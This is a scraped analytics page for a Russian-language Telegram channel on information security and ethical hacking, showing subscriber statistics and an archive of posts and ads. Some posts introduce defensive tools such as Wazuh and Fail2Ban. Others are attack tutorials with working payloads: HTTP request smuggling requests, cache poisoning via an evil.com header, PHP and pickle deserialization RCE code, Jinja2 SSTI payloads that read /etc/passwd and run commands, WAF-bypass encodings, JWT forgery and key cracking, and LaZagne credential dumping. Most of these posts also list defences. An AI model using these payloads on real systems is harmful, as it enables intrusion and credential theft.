en
Feedback
CodeGuard: PySec Edition

CodeGuard: PySec Edition

Closed channel

Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy

Show more

📈 Analytical overview of Telegram channel CodeGuard: PySec Edition

Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 180 subscribers, ranking 8 724 in the Technologies & Applications category and 45 616 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 180 subscribers.

According to the latest data from 29 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 873 over the last 30 days and by 56 over the last 24 hours, overall reach remains high.

  • Verification status: Not verified
  • Engagement rate (ER): The average audience engagement rate is 9.97%. Within the first 24 hours after publication, content typically collects 5.53% reactions from the total number of subscribers.
  • Post reach: On average, each post receives 1 413 views. Within the first day, a publication typically gains 784 views.
  • Reactions and interaction: The audience actively supports content: the average number of reactions per post is 6.
  • Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”

Thanks to the high frequency of updates (latest data received on 30 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

14 180
Subscribers
+5624 hours
+1687 days
+87330 days
Posts Archive
🛡 Wazuh: SIEM и защита хостов в одном флаконе Wazuh — это open-source платформа для мониторинга безопасности, обнаружения вт
🛡 Wazuh: SIEM и защита хостов в одном флаконе Wazuh — это open-source платформа для мониторинга безопасности, обнаружения вторжений и соответствия требованиям. Подходит для серверов, контейнеров и облаков. Часто используют как бесплатную альтернативу коммерческим SIEM. ⚙️ Ключевые возможности Wazuh:
▶️ HIDS — обнаружение атак и подозрительных действий на хосте ▶️ Анализ логов (SSH, sudo, nginx, systemd, Docker) ▶️ File Integrity Monitoring — контроль изменений файлов ▶️ Vulnerability Detection — поиск уязвимостей в ПО ▶️ Интеграция с Elastic Stack (Kibana, Elasticsearch)
⚡️ Быстрый старт с Wazuh: Установка (all-in-one):
curl -sO https://packages.wazuh.com/4.7/wazuh-install.sh
sudo bash wazuh-install.sh -a
Проверка статуса:
sudo systemctl status wazuh-manager
Подключение агента:
sudo wazuh-agent-auth -m <IP_MANAGER>
📱 GitHub 😈 CodeGuard: PySec Edition | Чат

ChatGPT всегда говорит, что ты прав 😂 А потом на деле оказываешься по локоть в логах и дебажишь то, что по словам gpt должно
ChatGPT всегда говорит, что ты прав 😂 А потом на деле оказываешься по локоть в логах и дебажишь то, что по словам gpt должно было работать идеально 😄 💋 Нейросети обучены льстить И им сложно НЕ соглашаться со всем подряд. ⚡️В NeuroNinja рабочие техники от инженера СберТехнологий. Честные заметки о том, как эффективно использовать LLM и реальные кейсы для твоих проектов. 👉 Подписаться: https://t.me/+0LcdDOKQwBU3MGRi

🛡 Fail2Ban: защита от взлома через логи Fail2Ban — это open-source инструмент для защиты серверов от brute-force атак, скани
🛡 Fail2Ban: защита от взлома через логи Fail2Ban — это open-source инструмент для защиты серверов от brute-force атак, сканирования и подозрительных попыток входа. Он анализирует логи сервисов (SSH, nginx, ftp, mail) и автоматически блокирует подозрительные IP через firewall. ⚙️ Ключевые возможности Fail2Ban:
▶️ Мониторинг логов любых сервисов ▶️ Автоматическое банирование IP при множественных неудачных попытках ▶️ Настраиваемые фильтры и действия (ban, alert, custom scripts) ▶️ Поддержка iptables, nftables и firewalld ▶️ Масштабируемость через конфиги и собственные фильтры
⚡️ Быстрый старт с Fail2Ban: Установка (Ubuntu/Debian):
sudo apt update
sudo apt install fail2ban
Запуск и проверка:
sudo systemctl enable fail2ban
sudo systemctl start fail2ban
sudo fail2ban-client status
Настройка для SSH:
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
sudo nano /etc/fail2ban/jail.local
# включить [sshd] и задать maxretry, bantime
sudo systemctl restart fail2ban
📱 GitHub 😈 CodeGuard: PySec Edition | Чат

🛡 CrowdSec: коллективная защита от атак CrowdSec — это open-source behavior-based IPS, который анализирует поведение трафика
🛡 CrowdSec: коллективная защита от атак CrowdSec — это open-source behavior-based IPS, который анализирует поведение трафика и автоматически блокирует атаки: brute-force, credential stuffing, сканирование, web-атаки и ботов. В отличие от классических WAF, CrowdSec работает как движок корреляции событий и использует глобальную базу угроз, формируемую сообществом. ⚙️ Ключевые возможности CrowdSec:
▶️ Анализ логов (nginx, apache, ssh, docker, cloud-сервисы) ▶️ Обнаружение атак по поведению, а не по сигнатурам ▶️ Автоматические решения: ban, captcha, rate-limit ▶️ Интеграция с firewall, reverse-proxy, cloud и CDN ▶️ Общая threat-intelligence база от тысяч инсталляций
⚡️ Быстрый старт с CrowdSec: Установка:
curl -s https://install.crowdsec.net | sudo sh
sudo apt install crowdsec
Проверка:
sudo cscli metrics
🟢Подключение bouncer (например, для nginx или firewall) 🟢Настройка сценариев и политик через collections 🟢 Автоматическое обновление правил из community-hub
🤯 Документация — CrowdSec Docs 📱 Репозиторий GitHub 😈 CodeGuard: PySec Edition | Чат

Сеньор за полгода? 📈 Эта девушка получила оффер в IT-компанию, хотя весь её опыт — пара курсов с ютуба 😱 Она воспользовалас
Сеньор за полгода? 📈 Эта девушка получила оффер в IT-компанию, хотя весь её опыт — пара курсов с ютуба 😱 Она воспользовалась ИИ-помощником и легко скрыла все свои пробелы в знаниях. Теперь впереди: ⤵️ удалёнка, стартовое обучение и ставка 55$ в час. Проходи собеседования вместе с Interview Ninja 🥷 Проверь успех на себе — есть 100 бесплатных запросов на день. 👉 @interview_ninja

🙈 HTTP Request Smuggling: когда серверы не согласны друг с другом Атака, при которой front-end и back-end серверы по-разному парсят границы HTTP-запросов. Результат - твой запрос «склеивается» с чужим. Последствия:
🔴Обход WAF и аутентификации 🔴Захват чужих запросов 🔴Cache poisoning на стероидах
1️⃣ В чём суть HTTP позволяет указать длину тела двумя способами: Content-Length и Transfer-Encoding: chunked Если front-end читает CL, а back-end - TE (или наоборот), атакующий прячет второй запрос внутри первого. 2️⃣ Мини-пример (CL.TE)
POST / HTTP/1.1
Content-Length: 13
Transfer-Encoding: chunked

0

GET /admin
Front-end видит 13 байт и пропускает всё. Back-end читает chunked, видит 0 (конец) - а GET /admin приклеивается к следующему запросу другого юзера. 3️⃣ Где искать
🔵Load balancer + backend 🔵CDN + origin 🔵Любая цепочка прокси
4️⃣ Защита
🔵HTTP/2 end-to-end 🔵Отклонять запросы с обоими заголовками 🔵Единый парсер на всех уровнях
😈 CodeGuard: PySec Edition | Чат

Рекомендую новый канал по ИБ — @N3tHunterLab Здесь реальный пентест-контент без воды: 🟣 Разборы уязвимостей и кейсы 🟣 OSINT-инструменты и гайды 🟣 Практика для админов/тестеров 🟣 Новости ИБ + ламповые посты Канал ведется действующим специалистом по ИБ. @N3tHunterLab

👩‍💻 Web Cache Poisoning: когда кэш работает против тебя Web Cache Poisoning — атака, при которой злоумышленник подсовывает
👩‍💻 Web Cache Poisoning: когда кэш работает против тебя Web Cache Poisoning — атака, при которой злоумышленник подсовывает вредный ответ в CDN или reverse-proxy. Последствия:
🔴 XSS для всех 🔴 подмена страниц 🔴 кража сессий
1️⃣ В чём суть Кэш учитывает одни заголовки, а backend — другие. Атакующий ищет заголовок, который влияет на формирование ответа, но при этом не участвует в cache key. 2️⃣ Мини-практика Добавь заголовок:
X-Forwarded-Host: evil.com
Если в ответе меняются ссылки или JS — проверь, кэшируется ли этот ответ. Повтори запрос без заголовка: если контент тот же → кэш отравлен. 3️⃣ Где встречается
🟢 CDN + backend 🟢 reverse proxy 🟢 high-load сайты
4️⃣ Защита
🟢 whitelist заголовков 🟢 cache key = все влияющие поля 🟢 no-store для динамики
😈 CodeGuard: PySec Edition | Чат

👩‍💻 HTTP Request Smuggling: атака между прокси и сервером Request Smuggling — редкая и опасная веб‑уязвимость, возникающая,
👩‍💻 HTTP Request Smuggling: атака между прокси и сервером Request Smuggling — редкая и опасная веб‑уязвимость, возникающая, когда прокси и backend по‑разному интерпретируют один HTTP‑запрос. Итог: один запрос превращается в два. Последствия:
🔴 обход авторизации 🔴 кража сессий 🔴 cache poisoning 🔴 скрытые запросы к /admin
1️⃣ В чём суть Конфликт заголовков Content-Length и Transfer-Encoding: chunked. Один компонент верит длине, другой — чанкам. 2️⃣ Пример (CL.TE)
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: target.com
Proxy считает запрос завершённым, backend — выполняет GET /admin. 3️⃣ Как находят
🔴 несколько прокси / CDN 🔴 странные тайминги ответа 🔴 рассинхрон ответов
4️⃣ Где встречается
🟢 CDN + backend 🟢 Load balancer → legacy‑сервисы 🟢 Microservices 🟢 High‑load API
5️⃣ Защита
🟢запрещать CL + TE 🟢нормализовать запросы 🟢использовать HTTP/2 end‑to‑end
😈 CodeGuard: PySec Edition | Чат

💻Пока одни ставят антивирус, другие уже в дампе. Хочешь понимать, как реально ломают, а не как пишут в учебниках? Где фейлы
💻Пока одни ставят антивирус, другие уже в дампе. Хочешь понимать, как реально ломают, а не как пишут в учебниках? Где фейлы DevOps превращаются в RCE, а «я просто открыл PDF» — в инцидент Здесь ты найдёшь: — хакинг без розовых пони — инфобез с матом и фактами — разборы уязвимостей, эксплойтов и громких взломов — мемы, после которых SOC плачет 🫵Подписывайся! 😂Предупреждение: после подписки ты начнёшь подозрительно смотреть на Wi-Fi и обновления.

🦈 WireShark Полный курс Часть-3 Добро пожаловать в третью часть нашего полного курса по Wireshark! Этот курс предназначен для тех, кто хочет овладеть мощными навыками анализа сетевого трафика и научиться эффективно использовать один из самых популярных инструментов для мониторинга и отладки сетей – Wireshark. 📱 Смотреть на Ютуб 😈 CodeGuard: PySec Edition | Чат

👩‍💻 Deserialization Attacks: когда данные превращаются в RCE Небезопасная десериализация — это когда приложение доверяет да
👩‍💻 Deserialization Attacks: когда данные превращаются в RCE Небезопасная десериализация — это когда приложение доверяет данным, которые само же и выполняет. Пользователь подсовывает объект → приложение его «восстанавливает» → код исполняется. Итог: RCE, LFI, logic abuse. 1️⃣ Что такое десериализация Десериализация — процесс восстановления объекта из байтов / строки. Примеры:
🟢Java: ObjectInputStream.readObject() 🟢PHP: unserialize() 🟢Python: pickle.loads() 🟢.NET: BinaryFormatter
2️⃣ Детекция уязвимости Признаки:
🔴 Base64 / бинарные blobs в cookies, headers, body 🔴 Параметры вроде data=, state=, profile= 🔴 Ошибки классов при кривом вводе
Пример (PHP):
$data = unserialize($_COOKIE['session']);
Тест:
O:8:"stdClass":1:{s:4:"test";s:4:"hack";}
Если приложение падает или реагирует — точка входа найдена. 3️⃣ Эксплуатация (примеры) PHP:
class Evil {
  public function __destruct() {
    system($_GET['cmd']);
  }
}
Python pickle:
import pickle, os

class RCE:
    def __reduce__(self):
        return (os.system, ("id",))

pickle.dumps(RCE())
4️⃣ Обход фильтров
🔴 Base64 + gzip 🔴 Использование разрешённых классов 🔴 Type juggling (PHP) 🔴 JSON → object cast 🔴 Partial deserialization
5️⃣ Где встречается чаще всего
🟢 Cookies (session, rememberMe) 🟢 JWT с кастомными payload’ами 🟢 Mobile API 🟢 Legacy Java apps 🟢 Microservices (internal trust)
6️⃣ Защита
🔴 Никогда не десериализуйте пользовательские данные 🔴 Используйте JSON + строгую схему 🔴 Allowlist классов 🔴 Отключайте опасные форматы (pickle, BinaryFormatter) 🔴 Подписывайте данные (HMAC) 🔴 IDS на gadget patterns
😈 CodeGuard: PySec Edition | Чат

👩‍💻 Всем программистам посвящается! Держите хороший авторский канал про разработку мини-проектов, игр и ботов на Python с о
👩‍💻 Всем программистам посвящается! Держите хороший авторский канал про разработку мини-проектов, игр и ботов на Python с объяснением, контент ежедневно пополняется новыми постами: Обучение Python с нуля Обучение Django с нуля Обучение Flask с нуля Обучение Pandas с нуля Обучение PyTorch с нуля Обучение NumPy с нуля 📌 Шпаргалки, гайды, ресурсы, задачи и советы — всё собрано в одном месте: @python_ready

🦈 WireShark Полный курс Часть-2 Добро пожаловать в вторую часть нашего полного курса по Wireshark! Этот курс предназначен дл
🦈 WireShark Полный курс Часть-2 Добро пожаловать в вторую часть нашего полного курса по Wireshark! Этот курс предназначен для тех, кто хочет овладеть мощными навыками анализа сетевого трафика и научиться эффективно использовать один из самых популярных инструментов для мониторинга и отладки сетей – Wireshark. 📱 Смотреть на Ютуб 😈 CodeGuard: PySec Edition | Чат

👩‍💻 SSTI: инъекции в шаблонизаторы — от детекта до RCE Server-Side Template Injection - когда пользовательский ввод попадае
👩‍💻 SSTI: инъекции в шаблонизаторы — от детекта до RCE Server-Side Template Injection - когда пользовательский ввод попадает прямо в шаблон. Результат? Выполнение кода на сервере. Разбираем по шагам. 1️⃣ Детекция уязвимости Базовые полиглот-пейлоады для теста:
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
Если видите 49 в ответе - шаблонизатор исполняет код. 2️⃣ Идентификация движка
{{7*'7'}} → 7777777 = Jinja2/Twig
{{7*'7'}} → 49 = Twig
${7*7} → 49 = Mako/FreeMarker
#{7*7} → 49 = Ruby ERB
Автоматизация через tplmap:
git clone https://github.com/epinna/tplmap
python tplmap.py -u "http://target.com/?name=test"
3️⃣ Эксплуатация Jinja2 (Flask) Чтение файлов:
{{ ''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read() }}
RCE через subprocess:
{{ ''.__class__.__mro__[1].__subclasses__()[408]('id', shell=True, stdout=-1).communicate() }}
Поиск нужного класса:
{% for c in ''.__class__.__mro__[1].__subclasses__() %}
  {% if 'Popen' in c.__name__ %}
    {{ loop.index0 }}: {{ c }}
  {% endif %}
{% endfor %}
4️⃣ Обход WAF и фильтров Без точек и скобок:
{{ request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f') }}
Конкатенация строк:
{{ ''['__cla'+'ss__'] }}
Hex-кодирование:
{{ ''['\x5f\x5fclass\x5f\x5f'] }}
5️⃣ Защита
🔴Никогда не передавайте пользовательский ввод в render_template_string() 🔴Используйте sandbox-режим (Jinja2 SandboxedEnvironment) 🔴Экранируйте всё через | e фильтр 🔴CSP и мониторинг аномальных запросов
😈 CodeGuard: PySec Edition | Чат

⚡️Слита База из 1000+ топовых курсов и материалов для айтишников Отсортировали их для вашего удобства и выложили в телеграм-каналы по категориям: 🤖 Нейросети – 855+ материалов 🖥 Python — 1558+ материалов 👩‍💻 Frontend — 1241+ материалов 👩‍💻 Backend — 1095+ материалов ⚙️ Программы — 978+ материалов 📚 Книги по IT — 779+ материалов Всё лучшее про IT бесплатно — уже на Базе 🚀

JWT: аудит токенов на уязвимости — разбор с примерами и инструментами JSON Web Tokens (JWT) — популярный стандарт для аутенти
JWT: аудит токенов на уязвимости — разбор с примерами и инструментами JSON Web Tokens (JWT) — популярный стандарт для аутентификации, но часто с дырами: слабые ключи, none-алгоритм или подделка подписей. Вот пошаговый гид по аудиту и эксплуатации. 1️⃣ Декодирование и базовый анализ Начните с jwt.io или CLI:
pip install pyjwt  
python3 -c "import jwt; print(jwt.decode('eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...', algorithms=['HS256']))"  
Проверьте: алгоритм (alg), payload (claims вроде exp, iss) и подпись. 2️⃣ Классические уязвимости
🔵None-alg атака: Меняйте "alg" на "none" и удалите подпись. 🔵Key confusion: Если RS256, подмените публичный ключ на секретный (HS256).
Инструмент: jwt_tool — автоматизирует тесты:
git clone https://github.com/ticarpi/jwt_tool  
python3 jwt_tool.py eyJhbGciOiJSUzI1NiJ9... -T  
3️⃣ Практические команды для пентеста Генерация слабого токена (тест):
import jwt  
token = jwt.encode({'user': 'admin'}, 'weakkey', algorithm='HS256')  
print(token)  
Проверка слабых ключей (wordlist):
jwt_tool.py YOUR_TOKEN.txt -C -d rockyou.txt  
Массовый аудит логов/токенов:
grep -r "eyJ" /var/log/app/ | jwt_tool.py -b -vv  
4️⃣ Защита и лучшие практики
🔴Всегда проверяйте "alg" на сервере (только whitelisted). 🔴Используйте сильные ключи (>256 бит) и ротацию. 🔴Добавьте "kid" с валидацией и JWE для шифрования. 🔴Мониторьте: ELK или Splunk для аномальных JWT.
Освойте эти техники и ваши аудиты аутентификации станут на голову выше. 😈 CodeGuard: PySec Edition | Чат

👁 pspy: шпионаж за процессами без root Обычно, чтобы увидеть чужие процессы, cron-задачи или команды админа, нужны права roo
👁 pspy: шпионаж за процессами без root Обычно, чтобы увидеть чужие процессы, cron-задачи или команды админа, нужны права root. pspy ломает это ожидание. Что это: Standalone binary для Linux, который использует особенности /proc и событий ядра, чтобы отслеживать запуск процессов. Что умеет pspy:
🔵 Видит запуск процессов в реальном времени 🔵 Показывает команды, аргументы, пользователей 🔵 Отлавливает cron, systemd timers, scripts 🔵 Работает без root и без ptrace 🔵 Не требует установки и зависимостей
1️⃣ Запуск
chmod +x pspy64
./pspy64
2️⃣ Пример вывода
2025/01/03 12:01:00 CMD: UID=0 PID=1234 | /bin/bash /opt/backup.sh
2025/01/03 12:01:00 CMD: UID=0 PID=1235 | tar czf /tmp/backup.tar.gz /home/*
Вы сразу видите:
🟢пользователь UID=0 🟢путь к скрипту 🟢аргументы 🟢момент запуска
3️⃣ Почему это опасно
🔴 cron-скрипты часто пишутся небезопасно 🔴 пути без абсолютных бинарей 🔴 writable каталоги 🔴 утечки паролей через аргументы команд
4️⃣ Как это работает изнутри
🔵 Чтение /proc в цикле 🔵 Отслеживание fork/exec событий 🔵 Сравнение snapshot-ов процессов 🔵 Никакого ptrace и CAP_SYS_PTRACE
5️⃣ Где применяется:
🟢 Linux privilege escalation 🟢 Red Team и post-exploitation 🟢 CTF (medium-hard) 🟢 Аудит cron и сервисных скриптов
😈 CodeGuard: PySec Edition | Чат

🧠 ptrace: как Linux позволяет процессам шпионить друг за другом В Linux один процесс может полностью контролировать другой.
🧠 ptrace: как Linux позволяет процессам шпионить друг за другом В Linux один процесс может полностью контролировать другой. Читать память, перехватывать syscalls, менять регистры. Это делает ptrace. Что это: Системный вызов ядра Linux для трассировки и управления процессами. Основа отладчиков, strace и антиотладки. Что умеет:
🔴 Читать и писать память другого процесса 🔴 Останавливать выполнение на каждом syscall 🔴 Менять регистры CPU на лету 🔴 Инжектить код и управлять потоком выполнения
Минимальный пример (C):
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

ptrace(PTRACE_TRACEME, 0, NULL, NULL);
execl("/bin/ls", "ls", NULL);
Перехват syscalls (идея):
ptrace(PTRACE_SYSCALL, pid, NULL, NULL);
waitpid(pid, NULL, 0);
Где применяется:
🟢 gdb и отладчики 🟢 strace, ltrace 🟢 Античит и антидебаг 🟢 Reverse engineering и malware analysis
👩‍💻 CodeGuard: Linux | Чат

LaZagne: извлечение сохранённых паролей в системе 🔑 Пароли часто не только подбирают - их просто вытаскивают из памяти и кон
LaZagne: извлечение сохранённых паролей в системе 🔑 Пароли часто не только подбирают - их просто вытаскивают из памяти и конфигов. LaZagne - это инструмент для аудита сохранённых паролей в операционной системе. Он показывает, какие учетные данные уже лежат в открытом или слабо защищённом виде. LaZagne работает без брутфорса, он извлекает уже сохранённые данные. Что умеет LaZagne? Он поддерживает десятки источников:
🔵 Браузеры (логины, пароли, cookies, иногда токены) 🔵 Wi-Fi Пароли от сохранённых беспроводных сетей 🔵 Почтовые клиенты 🔵 Базы данных и сервисы 🔵 Системные и сторонние приложения
Представьте, что вы специалист по безопасности и проверяете, какие секреты может получить атакующий после входа в систему пользователя. 1️⃣ Запуск базового сканирования В Linux / Windows (Python-версия):
python3 laZagne.py all
LaZagne автоматически:
🔵определит ОС 🔵просканирует все поддерживаемые модули 🔵выведет найденные пароли
2️⃣ Сканирование конкретного модуля Например, только браузеры:
python3 laZagne.py browsers
Или только Wi-Fi:
python3 laZagne.py wifi
3️⃣ Пример результата
[+] Chrome passwords found !!!
URL: https://mail.example.com
Login: admin@example.com
Password: Summer2023!
4️⃣ Как это работает изнутри
🔵 DPAPI (Windows) LaZagne использует системные API для расшифровки данных, которые ОС считает «доверенными». 🔵 Чтение конфигов Многие программы хранят пароли в XML / JSON / INI файлах. 🔵 Memory & credential scraping Частично извлекает данные из памяти приложений.
5️⃣ Профилактика: как защититься?
🔴 Используйте менеджеры паролей с мастер-паролем (KeePassXC, Bitwarden) 🔴 Отключайте сохранение паролей в браузерах на рабочих машинах 🔴 Используйте раздельные учётные записи (пользователь ≠ администратор) 🔴 Включайте полное шифрование диска (LUKS / BitLocker) 🔴 Для корпоративной среды - Credential Guard и AppLocker
😈 CodeGuard: PySec Edition | Чат